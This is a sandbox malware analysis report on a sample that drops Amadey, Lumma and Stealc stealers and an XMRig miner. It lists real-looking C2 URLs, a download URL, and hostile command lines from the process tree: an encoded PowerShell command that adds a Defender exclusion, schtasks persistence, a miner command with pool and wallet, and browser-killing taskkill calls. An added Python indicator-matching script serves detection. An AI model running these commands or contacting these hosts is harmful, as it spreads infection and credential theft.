Resubmissions
16/03/2025, 14:27  250316-rslvgaszdx  score 10
16/03/2025, 08:13  250316-j4f5cswsfx  score 10
15/03/2025, 11:26  250315-njwrjawlt6  score 10
Analysis
max time kernel: 136s
max time network: 269s
platform: windows7_x64
resource: win7-20241023-en
resource tags: arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
submitted: 15/03/2025, 11:26
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
random.exe
Resource
win10ltsc2021-20250314-en
General
Target: random.exe
Size: 5.6MB
MD5: f0cad0627e4b852e7ce633df29855373
SHA1: 3187e3016d889fdcb5f3c38cc19c1dac27163fe4
SHA256: e7b933849e850c1778c1378c7a5d07df318d86f7b3ee6257885b768fa81f685c
SHA512: c121d9a4d2ced148ac422e193096e7596c8270c662065b9f16efe4ec4ccc1552b44ad92511246fdde7fed55fbb53c178a5da28a84533707a907084c25ad9c615
SSDEEP: 98304:6zd9u3jgDjebrGE5pd8PY22ImKYMFCqgupRERune9rmqy3kG/TQ8swX+hh/YG6GR:0dMgebrREbJPYIpKcneY13LTQf6+hVYM
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
Family: amadey
Version: 5.21
Botnet: 092155
C2: http://176.113.115.6
install_dir: bb556cff4a
install_file: rapes.exe
strings_key: a131b127e996a898cd19ffb2d92e481b
url_paths: /Ni9kiput/index.php
Extracted
Family: lumma
C2: https://citydisco.bet/api
C2: https://crosshairc.life/api
C2: https://mrodularmall.top/api
C2: https://jowinjoinery.icu/api
C2: https://legenassedk.top/api
C2: https://4htardwarehu.icu/api
C2: https://cjlaspcorne.icu/api
C2: https://bugildbett.top/api
C2: https://weaponrywo.digital/api
Extracted
Family: stealc
Botnet: trump
C2: http://45.93.20.28
url_path: /85a1cacf11314eb8.php
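The extracted config above is only useful once it is turned into something that can be matched against traffic. The block below is an added example, not part of the Triage report and not code from any of the malware families it names: it builds a host/path index from the download URL, the Amadey, Lumma and Stealc C2 entries and the XMRig pool from the miner command line in the process tree, then runs a few constructed proxy log lines (made up for the demo, in a Squid-like "time src method target - status" shape) through it. A bare host hit is reported separately from a full C2 URL hit so an analyst can tell the two apart.

```python
"""Added example (not part of the Triage report): turn the extracted
config into an indicator index and scan constructed proxy log lines."""
import re
from urllib.parse import urlsplit

# Indicators copied from the "Malware Config" section and the XMRig
# command line in the process tree.  Keys are the family names Triage reported.
IOCS = {
    "amadey": ["http://176.113.115.7/mine/random.exe",
               "http://176.113.115.6/Ni9kiput/index.php"],
    "lumma":  ["https://citydisco.bet/api", "https://crosshairc.life/api",
               "https://mrodularmall.top/api", "https://jowinjoinery.icu/api",
               "https://legenassedk.top/api", "https://4htardwarehu.icu/api",
               "https://cjlaspcorne.icu/api", "https://bugildbett.top/api",
               "https://weaponrywo.digital/api"],
    "stealc": ["http://45.93.20.28/85a1cacf11314eb8.php"],
    "xmrig":  ["pool.hashvault.pro:443"],     # mining pool, host:port only
}


def build_index(iocs):
    """Map host -> {family, paths}; an empty path set means 'any path on this host'."""
    index = {}
    for family, urls in iocs.items():
        for u in urls:
            parts = urlsplit(u if "://" in u else "//" + u)
            entry = index.setdefault(parts.hostname, {"family": family, "paths": set()})
            if parts.path:
                entry["paths"].add(parts.path)
    return index


def match_event(index, host, path=None):
    """Return the family for a host[/path] hit, 'family (host only)' when the host
    is known but the path is not one of the extracted C2 paths, or None."""
    entry = index.get(host.lower())
    if entry is None:
        return None
    if path is None or not entry["paths"] or path in entry["paths"]:
        return entry["family"]
    return entry["family"] + " (host only)"


# Constructed sample lines (not from the report): "time src method target - status".
SAMPLE_PROXY = [
    "1742040000.123 10.0.0.5 GET http://176.113.115.6/Ni9kiput/index.php - 200",
    "1742040001.456 10.0.0.5 CONNECT citydisco.bet:443 - 200",
    "1742040002.789 10.0.0.7 GET http://example.com/index.html - 200",
    "1742040003.000 10.0.0.5 CONNECT pool.hashvault.pro:443 - 200",
]
PROXY_RE = re.compile(r"^\S+ (?P<src>\S+) (?P<method>\S+) (?P<target>\S+) ")


def scan_proxy_log(lines, index):
    """Return (src, target, family) for every line that touches an indicator."""
    hits = []
    for line in lines:
        m = PROXY_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if m.group("method") == "CONNECT":            # TLS: host:port only, no path
            fam = match_event(index, target.partition(":")[0])
        else:
            parts = urlsplit(target)
            fam = match_event(index, parts.hostname or "", parts.path)
        if fam:
            hits.append((m.group("src"), target, fam))
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY, build_index(IOCS)):
        print("%s -> %s  [%s]" % hit)
```

The Lumma domains and the mining pool only ever show up as CONNECT targets in a proxy log, so the index deliberately matches those on host alone; the Amadey and Stealc entries carry a path and are matched on it, which is what separates real C2 check-ins from unrelated traffic to a shared IP.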
Signatures
Amadey family
Lumma family
Stealc family
Xmrig family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description  ioc  Process
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  2x8387.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  93R1PJ3LML991IHAH15X.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  3r19R.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  400f34b24d.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  rapes.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  a47cfd9534.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  SAU9CL9T4LCM8EX1AEI8AP2BQI.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  7f23b4fca3.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  1u87m9.exe
XMRig Miner payload 11 IoCs
resource  yara_rule
behavioral1/memory/800-352-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-354-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-356-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-358-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-360-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-362-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-364-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-366-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-369-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-370-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
behavioral1/memory/800-372-0x0000000140000000-0x00000001408C3000-memory.dmp  xmrig
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Runs PowerShell with the display window hidden.
pid  Process
3920  powershell.exe
3840  powershell.exe
2032  powershell.exe
1148  powershell.exe
3416  powershell.exe
3492  powershell.exe
2856  powershell.exe
1572  powershell.exe
3292  powershell.exe
3420  powershell.exe
Downloads MZ/PE file 14 IoCs
flow  pid  Process
10  2996  2x8387.exe
14  2248  rapes.exe
37  772  400f34b24d.exe
16  2248  rapes.exe
21  2248  rapes.exe  (x10)
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description  ioc  Process
Each of the following processes queried both \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion and \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Key value queried):
a47cfd9534.exe
SAU9CL9T4LCM8EX1AEI8AP2BQI.exe
1u87m9.exe
93R1PJ3LML991IHAH15X.exe
3r19R.exe
400f34b24d.exe
7f23b4fca3.exe
2x8387.exe
rapes.exe
Executes dropped EXE 22 IoCs
pid  Process
1740  u0k28.exe
1752  1u87m9.exe
2248  rapes.exe
2996  2x8387.exe
2052  93R1PJ3LML991IHAH15X.exe
1516  3r19R.exe
1300  9JFiKVm.exe
2084  packed.exe
2892  0000009092.exe
1756  b0hgYat.exe
1696  b0hgYat.exe
2088  Esu6YYl.exe
1548  Esu6YYl.exe
1712  O9s3coZ.exe
2536  Esu6YYl.exe
800  Esu6YYl.exe
1424  j21Hq7C.exe
772  400f34b24d.exe
700  a47cfd9534.exe
2216  79704c4279.exe
2460  SAU9CL9T4LCM8EX1AEI8AP2BQI.exe
2844  7f23b4fca3.exe
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  1u87m9.exe
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  rapes.exe
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  2x8387.exe
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  93R1PJ3LML991IHAH15X.exe
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  a47cfd9534.exe
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  3r19R.exe
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  400f34b24d.exe
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  SAU9CL9T4LCM8EX1AEI8AP2BQI.exe
Key opened  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine  7f23b4fca3.exe
Loads dropped DLL 64 IoCs
pid  Process  (count, in order of first appearance)
2628  random.exe  (x3)
1740  u0k28.exe  (x4)
1752  1u87m9.exe  (x2)
2248  rapes.exe  (x14)
2996  2x8387.exe  (x2)
2052  93R1PJ3LML991IHAH15X.exe
1516  3r19R.exe
1300  9JFiKVm.exe
2864  WerFault.exe  (x4)
2084  packed.exe  (x3)
2892  0000009092.exe
1756  b0hgYat.exe  (x2)
1696  b0hgYat.exe  (x2)
2088  Esu6YYl.exe
872  cmd.exe
1548  Esu6YYl.exe  (x3)
1712  O9s3coZ.exe
2964  WerFault.exe  (x4)
1332  Process not Found
2404  Process not Found
800  Esu6YYl.exe
1424  j21Hq7C.exe
568  WerFault.exe  (x4)
772  400f34b24d.exe  (x2)
700  a47cfd9534.exe
2216  79704c4279.exe
2460  SAU9CL9T4LCM8EX1AEI8AP2BQI.exe
2844  7f23b4fca3.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 5 IoCs
description  ioc  Process
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""  u0k28.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\400f34b24d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10222710101\\400f34b24d.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\a47cfd9534.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10222720101\\a47cfd9534.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\79704c4279.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10222730101\\79704c4279.exe"  rapes.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""  random.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource  yara_rule
behavioral1/files/0x000500000001c8e7-426.dat  autoit_exe
behavioral1/files/0x0007000000016d3a-661.dat  autoit_exe
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid  Process
1752  1u87m9.exe
2248  rapes.exe
2996  2x8387.exe
2052  93R1PJ3LML991IHAH15X.exe
1516  3r19R.exe
772  400f34b24d.exe
700  a47cfd9534.exe
2460  SAU9CL9T4LCM8EX1AEI8AP2BQI.exe
2844  7f23b4fca3.exe
Suspicious use of SetThreadContext 2 IoCs
description  pid  Process  procid_target
PID 1548 set thread context of 2536  1548  Esu6YYl.exe  62
PID 1548 set thread context of 800  1548  Esu6YYl.exe  64
Drops file in Program Files directory 1 IoCs
description  ioc  Process
File created  C:\Program Files\RuntimeApp\0000009092.exe  packed.exe
Drops file in Windows directory 1 IoCs
description  ioc  Process
File created  C:\Windows\Tasks\rapes.job  1u87m9.exe
Detects Pyinstaller 1 IoCs
resource  yara_rule
behavioral1/files/0x0004000000004ed7-150.dat  pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 2 IoCs
pid  pid_target  Process  procid_target
1164  2844  WerFault.exe  86
3164  3444  WerFault.exe  138
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskkill.exe  (x5)
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  SAU9CL9T4LCM8EX1AEI8AP2BQI.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  random.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  3r19R.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  a47cfd9534.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language  79704c4279.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  1u87m9.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  400f34b24d.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  93R1PJ3LML991IHAH15X.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  79704c4279.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage  79704c4279.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  7f23b4fca3.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  u0k28.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  rapes.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  2x8387.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid  Process
872  cmd.exe
1400  PING.EXE
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel  firefox.exe
Delays execution with timeout.exe 1 IoCs
pid  Process
3156  timeout.exe
Enumerates system info in registry 2 TTPs 1 IoCs
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer  packed.exe
Kills process with taskkill 5 IoCs
pid  Process
1704  taskkill.exe
1724  taskkill.exe
1608  taskkill.exe
1732  taskkill.exe
1168  taskkill.exe
Modifies registry class 1 IoCs
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings  firefox.exe
Modifies system certificate store 2 TTPs 2 IoCs
description  ioc  Process
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8  rapes.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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  rapes.exe
Runs ping.exe 1 TTPs 1 IoCs
pid  Process
1400  PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  Process
2820  schtasks.exe
2080  schtasks.exe
3904  schtasks.exe
3736  schtasks.exe
3228  schtasks.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid  Process
1400  PING.EXE
1548  Esu6YYl.exe
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid  Process  (count)
1752  1u87m9.exe
2248  rapes.exe
2996  2x8387.exe  (x5)
2052  93R1PJ3LML991IHAH15X.exe
1516  3r19R.exe
1148  powershell.exe
1572  powershell.exe
772  400f34b24d.exe  (x5)
700  a47cfd9534.exe
2460  SAU9CL9T4LCM8EX1AEI8AP2BQI.exe
2216  79704c4279.exe
2844  7f23b4fca3.exe
Suspicious use of AdjustPrivilegeToken 9 IoCs
description  pid  Process
Token: SeDebugPrivilege  1148  powershell.exe
Token: SeDebugPrivilege  1572  powershell.exe
Token: SeLockMemoryPrivilege  800  Esu6YYl.exe  (x2)
Token: SeDebugPrivilege  1732  taskkill.exe
Token: SeDebugPrivilege  1168  taskkill.exe
Token: SeDebugPrivilege  1704  taskkill.exe
Token: SeDebugPrivilege  1724  taskkill.exe
Token: SeDebugPrivilege  1608  taskkill.exe
Suspicious use of FindShellTrayWindow 13 IoCs
pid  Process  (count)
1752  1u87m9.exe
800  Esu6YYl.exe
2216  79704c4279.exe  (x11)
Suspicious use of SendNotifyMessage 11 IoCs
pid  Process  (count)
2216  79704c4279.exe  (x11)
Suspicious use of WriteProcessMemory 64 IoCs
description  pid  Process  procid_target  (count)
PID 2628 wrote to memory of 1740  2628  random.exe  30  (x7)
PID 1740 wrote to memory of 1752  1740  u0k28.exe  31  (x7)
PID 1752 wrote to memory of 2248  1752  1u87m9.exe  32  (x7)
PID 1740 wrote to memory of 2996  1740  u0k28.exe  33  (x7)
PID 2996 wrote to memory of 2052  2996  2x8387.exe  36  (x7)
PID 2628 wrote to memory of 1516  2628  random.exe  37  (x7)
PID 2248 wrote to memory of 1300  2248  rapes.exe  39  (x7)
PID 1300 wrote to memory of 2864  1300  9JFiKVm.exe  41  (x5)
PID 2248 wrote to memory of 2084  2248  rapes.exe  42  (x7)
PID 2084 wrote to memory of 1148  2084  packed.exe  43  (x3)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1300 -s 1806⤵
- Loads dropped DLL
PID:2864
-
-
-
C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe" /sc onlogon /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2820
-
-
C:\Program Files\RuntimeApp\0000009092.exe"C:\Program Files\RuntimeApp\0000009092.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2892
-
-
-
C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -inputformat none -outputformat none -NonInteractive -Command Add -MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Updater"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
C:\Windows\system32\schtasks.exe"schtasks" /Create /SC ONLOGON /RL HIGHEST /TN "Updater" /TR "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe" /F6⤵
- Scheduled Task/Job: Scheduled Task
PID:2080
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.1 -n 3 > nul && start "" "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"6⤵
- Loads dropped DLL
- System Network Configuration Discovery: Internet Connection Discovery
PID:872 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 37⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1400
-
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1548 -
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exeC:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe curl.dll8⤵
- Executes dropped EXE
PID:2536
-
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exeC:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b148⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:800
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1712 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1712 -s 1806⤵
- Loads dropped DLL
PID:2964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1424 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1424 -s 1806⤵
- Loads dropped DLL
PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222710101\400f34b24d.exe"C:\Users\Admin\AppData\Local\Temp\10222710101\400f34b24d.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:772 -
C:\Users\Admin\AppData\Local\Temp\SAU9CL9T4LCM8EX1AEI8AP2BQI.exe"C:\Users\Admin\AppData\Local\Temp\SAU9CL9T4LCM8EX1AEI8AP2BQI.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222720101\a47cfd9534.exe"C:\Users\Admin\AppData\Local\Temp\10222720101\a47cfd9534.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:700
-
-
C:\Users\Admin\AppData\Local\Temp\10222730101\79704c4279.exe"C:\Users\Admin\AppData\Local\Temp\10222730101\79704c4279.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2216 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
